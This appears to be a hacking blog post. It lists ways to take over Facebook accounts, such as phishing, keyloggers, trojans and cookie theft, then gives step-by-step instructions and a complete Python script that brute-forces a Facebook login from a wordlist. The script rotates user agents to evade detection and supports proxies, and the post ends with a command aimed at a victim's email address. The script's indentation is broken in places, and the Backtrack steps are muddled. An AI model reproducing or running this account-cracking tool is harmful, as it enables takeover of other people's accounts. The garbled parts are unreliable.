HACK FACEBOOK USING BRUTE FORCE! WITH HYDRA BT_5



Methods To Hack Facebook?

following are some Various Methods to HACK a facebook Account!

1) Phishing :

The first and very basic way of hacking Facebook accounts is via Phishing. Phishing is actually creating fake web pages to steal user’s credentials like email,passwords,phone no,etc.

2) Keylogging :

This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file having keylogger in it to the victim. If the victim executes that file on his pc, whatever he types will be mailed/uploaded to hacker’s server. The advantage of this attack is that the victim won’t know that hacker is getting every Bit of data he is typing. Another big advantage is that hacker will get passwords of all the accounts used on that PC.

3) Trojans/backdoors :

This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC .

4)Sniffing:

It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.

5)Social Engineering :

This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
Answering the security questions also lies under this category.

6) Session Hijacking:

In a session hijacking attack an attacker steals victims cookies, cookies stores all the necessary logging Information about one’s account, using this info an attacker can easily hack anybody’s account. If you get the cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook, Google, Yahoo.

7) Tabnapping!

Tabnapping is similar to Phishing! But In tabnapping The In-active Tab Is changed to login screen :) 


--------------------------------------------------------------------------------------------------------------------------


NOW GET BACK TO MAIN TOPIC!


HACK FACEBOOK USING BRUTE FORCE! WITH HYDRA BT_5 (B
ACK TRACK 5 )
1st thing is to Boot Up your! BT_5 :) and open terminal!

1) then go to privilege escalation then select online attacks and then select hydra



2) then use python script for the brute force attack you can attack the victim only when he is in online!

3) get the python script!

JusT Copy And Paste It into Your notepad and save sa *py :)

#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname     : facebookbruteforcer.py
# Programmer     : MR:47{XYBER SHEIKH}_ <xybersheikh.mr47@hotmail.com,>
# Version    : 1.0
# Date        : Tue Jul 27 13:24:44 WIT 2012
# Special thanks to mywisdom to inspire me ;)

import re
import os
import sys
import random
import warnings
import time
try:
    import mechanize
except ImportError:
    print "[*] Please install mechanize python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
try:
    import cookielib
except ImportError:
    print "[*] Please install cookielib python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
    
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable 
__programmer__     = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__        = "1.0"
verbose     = False
useproxy    = False
usepassproxy    = False
log        = 'fbbruteforcer.log'
file        = open(log, "a")
success        = 'http://www.facebook.com/?sk=messages&amp;ref=mb'
fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent     = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
facebook     = '''
  __               _                 _    
 / _|             | |               | |   
| |_ __ _  ___ ___| |__   ___   ___ | | __
|  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_|  __/ |_) | (_) | (_) |   < 
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
                    bruteforcer...
                    
Programmer : %s
Version       : %s''' % (__programmer__, __version__)
option               = '''
Usage  : %s [options]
Option : -u, --username      <username>         |   User for bruteforcing
         -w, --wordlist      <filename>         |   Wordlist used for bruteforcing 
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy         <host:port>    |   Set http proxy will be use
         -k, --usernameproxy    <username>    |   Set username at proxy will be use
         -i, --passproxy    <password>    |   Set password at proxy will be use
         -l, --log         <filename>    |   Specify output filename (default : fbbruteforcer.log)
         -h, --help          <help>             |   Print this help
                                                            
Example : %s -u brad@hackme.com -w wordlist.txt"
       
P.S : add "&" to run in the background  
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme         = '''
Usage : %s [option]
    -h or --help for get help
    ''' % sys.argv[0]


def helpme():
    print facebook
    print option
    file.write(facebook)
    file.write(option)
    sys.exit(1)
    
def helpmee():
    print facebook
    print hme
    file.write(facebook)
    file.write(hme)
    sys.exit(1)
    
for arg in sys.argv:
    try:
        if arg.lower() == '-u' or arg.lower() == '--user':
                    username = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-l' or arg.lower() == '--log':
                    log = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--proxy':
                useproxy = True
                    proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                usepassproxy = True
                    usw = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                usepassproxy = True
                    usp = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
                    verbose = True
            elif arg.lower() == '-h' or arg.lower() == '--help':
                helpme()
        elif len(sys.argv) <= 1:
            helpmee()
    except IOError:
        helpme()
    except NameError:
        helpme()
    except IndexError:
        helpme()
                    
def bruteforce(word):
    try:
        sys.stdout.write("\r[*] Trying %s...                    " % word)
        file.write("[*] Trying %s\n" % word)
        sys.stdout.flush()
        br.addheaders = [('User-agent', random.choice(ouruseragent))]
        opensite = br.open(fblogin)
        br.select_form(nr=0)
        br.form['email'] = username
        br.form['pass'] = word
        br.submit()
        response = br.response().read()
        if verbose:
            print response
        if success in response:
            print "\n\n[*] Logging in success..."
            print "[*] Username : %s" % (username)
            print "[*] Password : %s\n" % (word)
            file.write("\n[*] Logging in success...")
            file.write("\n[*] Username : %s" % (username))
            file.write("\n[*] Password : %s\n\n" % (word))
            sys.exit(1)    
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    except mechanize._mechanize.FormNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
    except mechanize._form.ControlNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
        
def releaser():
    global word        
    for word in words:
        bruteforce(word.replace("\n",""))
        
def main():
    global br
    global words
    try:
        br = mechanize.Browser()
        cj = cookielib.LWPCookieJar()
        br.set_cookiejar(cj)
        br.set_handle_equiv(True)
        br.set_handle_gzip(True)
        br.set_handle_redirect(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_debug_http(False)
        br.set_debug_redirects(False)
        br.set_debug_redirects(False)
        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
        if useproxy:
            br.set_proxies({"http": proxy})
        if usepassproxy:
            br.add_proxy_password(usw, usp)
        if verbose:
            br.set_debug_http(True)
            br.set_debug_redirects(True)
            br.set_debug_redirects(True)
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        preventstrokes = open(wordlist, "r")
        words            = preventstrokes.readlines()
        count          = 0 
        while count < len(words): 
            words[count] = words[count].strip() 
            count += 1 
    except IOError: 
          print "\n[*] Error: Check your wordlist path\n"
        file.write("\n[*] Error: Check your wordlist path\n")
          sys.exit(1)
    except NameError:
        helpme()
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        print facebook
        print "\n[*] Starting attack at %s" % time.strftime("%X")
        print "[*] Account for bruteforcing %s" % (username)
        print "[*] Loaded :",len(words),"words"
        print "[*] Bruteforcing, please wait..."
        file.write(facebook)
        file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
        file.write("\n[*] Account for bruteforcing %s" % (username))
        file.write("\n[*] Loaded : %d words" % int(len(words)))
        file.write("\n[*] Bruteforcing, please wait...\n")
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    try:
        releaser()
        bruteforce(word)
    except NameError:
        helpme()

if __name__ == '__main__':
    main()

5) then type! python facebookbruteforce.py


6) then Type! python facebookbruteforce.py -h


7) now you write your victim mail id facebookbruteforce.py -u krishna*****.m13@gmail.com -w wordlist.txt




8) This Error Occurs because we have to create a word list and upload that after that it will brute force the particular email and the password will be found in password.txt file

9) Here's A link To download Simple Wordlist File! 


By S0ft Hcks!


MR:47{XYBER SHEIKH}

No comments: